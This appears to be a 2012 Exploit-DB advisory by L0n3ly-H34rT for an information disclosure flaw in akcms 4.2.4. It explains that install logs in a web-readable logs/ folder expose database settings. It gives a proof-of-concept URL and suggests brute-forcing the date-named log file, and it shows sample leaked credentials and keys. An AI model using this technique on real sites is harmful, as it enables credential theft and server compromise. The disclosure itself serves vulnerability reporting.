akcms 4.2.4 - Information Disclosure Vulnerability

2012-09-11T00:00:00
ID EDB-ID:21251
Type exploitdb
Reporter L0n3ly-H34rT
Modified 2012-09-11T00:00:00

Description

akcms 4.2.4 - Information Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            ############################################
### Exploit Title: akcms v4.2.4 Information Disclosure Vulnerability
### Date: 10/09/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.akcms.com/
### Software Link: http://download.akcms.com/download/akcms4.2.4.tar.gz
### Version: 4.2.4 ( may be old version is affect ! i don't check )
### Tested on: Linux/Windows 
############################################

# Explanation :

When you install script as first time, it will be generate file log & if we enter here for example :

http://127.0.0.1/akcms4.2.4/logs/

we see two files log:

1- for config log e.g. :

20120910.log

2- for failed login e.g. :

admin20120910.log

if we see first file, we see the name of file as the date when install script, but if we enter the folder and permission of index is on, we can read it ..

or we can brute force of that file by some programmer found in google or you can generate simple script for yourself ..

# P.O.C :

http://127.0.0.1/akcms4.2.4/logs/20120910.log

you will see the information of config like this for example :

16:57:56    127.0.0.1    file=install    $dbtype = 'mysql';
$dbhost = 'localhost';
$dbuser = 'root';
$dbpw = '000000';
$dbname = 'ak';
$tablepre = 'ak';
$charset = 'utf8';
$timedifference = '0';
$template_path = 'ak';
$codekey = 'snGrZU';
$cookiepre = '9x5G74';


############################################

# Greetz to my friendz